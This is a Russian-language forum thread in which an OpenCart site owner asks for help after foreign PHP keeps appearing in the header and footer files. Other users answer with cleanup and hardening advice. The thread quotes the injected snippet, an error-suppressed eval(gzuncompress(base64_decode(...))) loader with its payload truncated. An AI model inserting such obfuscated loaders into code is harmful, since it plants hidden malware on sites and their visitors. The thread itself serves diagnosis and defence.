инородный PHP на сайте

[kleem]

Здравствуйт

 

инородный PHP код в header и footer в директориях catalog/controller/common

 

грешу на VQMOD

 

в его логах есть такие строчки:

 

---------- Date: 2015-02-20 03:22:13 ~ IP : 46.161.41.199 ----------

REQUEST URI : /index.php?route=account/transaction

MOD DETAILS:

   modFile   : /var/www/enelt/data/www/eneltcom.by/vqmod/xml/vqmod_admin_apply_button_admin_product_1.5.1.3.xml

   id        : Admin Apply button (products, category, manufacturer, information, news)

   version   : 1.0.0

   vqmver    : 1.0.8

   author    : stalker780

Could not resolve path for [admin/controller/catalog/news.php] (SKIPPED)

Could not resolve path for [admin/view/template/catalog/news_form.tpl] (SKIPPED)

 

что за сталкер? что это такое вообще!?

 

буду благодарен за помощь!

 

[freelancer]

кнопка "применить" в админке, мод не находит файлов catalog/news.php, catalog/news.php

по умолчанию в движке их нет

[afwollis]

по vqmod freelancer написал.

а что за "инородный PHP код в header и footer в директориях catalog/controller/common" ?

[kleem]

ежедневно правит файлы хедер и футер. от чего перестают грузиться сайт. 

<?php
//###=###
error_reporting(0); ini_set("display_errors", "0"); eval(gzuncompress(base64_decode('eNqde/tzE+X3/7+ydvyMFGK6tyStfPp1uBTkWmgBEcu3s5Z+D8YBrjV........ и т.д.')));
//###=###
 
//###=###
error_reporting(0); ini_set("display_errors", "0"); eval(gzuncompress(base64_decode('eNqde/tzE+X3/7+ydvyMFGK6tyStfPp1uBTkW8YBrjV....и т.д.')));
//###=###
?>

[afwollis]

сканируй на shell-скрипты и прочую дрянь,

меняй данные для доступа на ftp,

меняй права на файлы на жесткие 644 (или и того меньше), чтобы только твой пользователь/аккаунт мог работать с файлами. (никаких 777 и "записи для others")

если рядом валяются joomla,wordpress итпд - подумай о разделении пространства. там часто густо дырки всплывают, через которые можно добраться и до других файлов.

[markimax]

сканируй на shell-скрипты и прочую дрянь,

меняй данные для доступа на ftp,

меняй права на файлы на жесткие 644 (или и того меньше), чтобы только твой пользователь/аккаунт мог работать с файлами. (никаких 777 и "записи для others")

если рядом валяются joomla,wordpress итпд - подумай о разделении пространства. там часто густо дырки всплывают, через которые можно добраться и до других файлов.

Я добавлю свои пять копеек:

И не качайте модули на варезах, там некоторые ублюдки вставляют шеллы и трояны в модули.